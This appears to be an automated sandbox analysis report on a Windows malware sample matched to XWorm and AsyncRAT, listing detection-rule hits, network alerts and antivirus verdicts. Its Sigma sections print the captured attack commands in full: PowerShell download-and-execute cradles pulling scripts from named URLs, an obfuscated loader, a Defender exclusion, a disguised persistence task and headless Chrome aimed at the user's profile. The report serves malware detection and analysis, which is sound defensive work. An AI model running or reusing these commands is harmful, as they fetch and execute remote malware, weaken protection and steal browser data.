51.2.powershell.exe.2b2016349c0.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x49b3:$str01: $VB$Local_Port 0x49a4:$str02: $VB$Local_Host 0x4c0d:$str03: get_Jpeg 0x4677:$str04: get_ServicePack 0x57a5:$str05: Select * from AntivirusProduct 0x59a3:$str06: PCRestart 0x59b7:$str07: shutdown.exe /f /r /t 0 0x5a69:$str08: StopReport 0x5a3f:$str09: StopDDos 0x5b35:$str10: sendPlugin 0x5cb5:$str12: -ExecutionPolicy Bypass -File " 0x5dde:$str13: Content-length: 5235
51.2.powershell.exe.2b2016349c0.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x604b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x60e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x61fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5cf9:$cnc4: POST / HTTP/1.1
Click to see the 8 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\spreadmalware.exe", ParentImage: C:\Users\user\Desktop\spreadmalware.exe, ParentProcessId: 7356, ParentProcessName: spreadmalware.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", ProcessId: 7868, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: MSHTA Suspicious Execution 01

Source: Process started

Author: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) , CommandLine: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8176, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) , ProcessId: 7752, ProcessName: mshta.exe

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1156, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", ProcessId: 1496, ProcessName: chrome.exe

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1156, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, ProcessId: 6624, ProcessName: schtasks.exe

Sigma detected: PowerShell Download and Execution Cradles

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\spreadmalware.exe", ParentImage: C:\Users\user\Desktop\spreadmalware.exe, ParentProcessId: 7356, ParentProcessName: spreadmalware.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", ProcessId: 7868, ProcessName: cmd.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', ProcessId: 3896, ProcessName: powershell.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7912, TargetFilename: C:\Users\user\AppData\Roaming\runtime.bat

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) , ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7752, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex", ProcessId: 7372, ProcessName: powershell.exe

Sigma detected: Browser Execution In Headless Mode

Source: Process started

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1156, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data", ProcessId: 1496, ProcessName: chrome.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1')) , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', ProcessId: 3896, ProcessName: powershell.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline", ProcessId: 7968, ProcessName: csc.exe

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe, ProcessId: 812, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw4y1zdz.p3f.ps1

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7912, TargetFilename: C:\Users\user\AppData\Roaming\runtime.bat

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1156, ParentProcessName: powershell.exe, ProcessCommandLine: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST, ProcessId: 6624, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\spreadmalware.exe", ParentImage: C:\Users\user\Desktop\spreadmalware.exe, ParentProcessId: 7356, ParentProcessName: spreadmalware.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", ProcessId: 7868, ProcessName: cmd.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp" "c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp" "c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 7968, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp" "c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP", ProcessId: 7952, ProcessName: cvtres.exe

Sigma detected: Wscript Shell Run In CommandLine

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) , CommandLine: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) , CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8176, ParentProcessName: cmd.exe, ProcessCommandLine: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) , ProcessId: 7752, ProcessName: mshta.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7372, TargetFilename: C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine: powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7868, ParentProcessName: cmd.exe, ProcessCommandLine: powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex", ProcessId: 7912, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5696, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7372, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline", ProcessId: 7968, ProcessName: csc.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T10:15:05.360559+0100	2803305	3	Unknown Traffic	192.168.2.7	49700	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T10:15:35.585443+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49863	140.82.121.3	443	TCP
2025-01-08T10:15:36.198513+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49875	185.199.111.133	443	TCP
2025-01-08T10:15:48.880963+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49955	140.82.121.3	443	TCP
2025-01-08T10:15:49.477697+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49963	185.199.111.133	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T10:16:50.455544+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	50010	149.154.167.220	443	TCP

Joe Security ANOMALY Windows PowerShell HTTP activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T10:15:08.397200+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49701	178.159.12.230	443	TCP
2025-01-08T10:15:10.037748+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49702	104.21.32.1	443	TCP
2025-01-08T10:15:11.609087+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49705	38.143.146.102	443	TCP
2025-01-08T10:15:24.732500+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49795	185.199.110.133	443	TCP
2025-01-08T10:15:33.822107+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49849	140.82.121.3	443	TCP
2025-01-08T10:15:34.444272+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49856	185.199.111.133	443	TCP
2025-01-08T10:15:34.460345+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49859	185.199.110.133	443	TCP
2025-01-08T10:15:34.747172+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49855	140.82.121.3	443	TCP
2025-01-08T10:15:35.413992+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49869	185.199.111.133	443	TCP
2025-01-08T10:15:35.585443+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49863	140.82.121.3	443	TCP
2025-01-08T10:15:36.198513+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49875	185.199.111.133	443	TCP
2025-01-08T10:15:47.152639+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49939	140.82.121.3	443	TCP
2025-01-08T10:15:47.763113+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49948	185.199.111.133	443	TCP
2025-01-08T10:15:47.851544+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49945	140.82.121.3	443	TCP
2025-01-08T10:15:48.514130+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49952	185.199.111.133	443	TCP
2025-01-08T10:15:48.880963+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49955	140.82.121.3	443	TCP
2025-01-08T10:15:49.477697+0100	1810000	2	Potentially Bad Traffic	192.168.2.7	49963	185.199.111.133	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: spreadmalware.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://pastejustit.com/raw/msdcgy3bxg	Avira URL Cloud: Label: phishing
Source: http://anonsharing.com	Avira URL Cloud: Label: malware
Source: https://anonsharing.com	Avira URL Cloud: Label: malware
Source: https://anonsharing.com/db59849be6b5f562/skibiditoilet.bat?download_token=a1e8551a275440a5e4f080f8e9763eec660cff556b920932c8cd94522d789e26	Avira URL Cloud: Label: malware
Source: https://anonsharing.com/file/13a37f52caaf958b/serverrefsvc.exe	Avira URL Cloud: Label: malware
Source: https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0	Avira URL Cloud: Label: malware
Source: https://anonsharing.com/13a37f52caaf958b/serverrefsvc.exe?download_token=8be855a1d746c3a8742464b1eb0c0de41850bb5ec93884b730d3cb871a169aeb	Avira URL Cloud: Label: malware
Source: https://anonsharing.com/file/db59849be6b5f562/skibiditoilet.bat	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: spreadmalware.exe	Virustotal: Detection: 45%			Perma Link
Source: spreadmalware.exe	ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for sample

Source: spreadmalware.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: https://raw.githubusercontent.com/43a1723/test/main/Ip
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: hai1723
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: FUD STUb
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	String decryptor: wintousb.exe

Source: spreadmalware.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.159.12.230:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 38.143.146.102:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49952 version: TLS 1.2
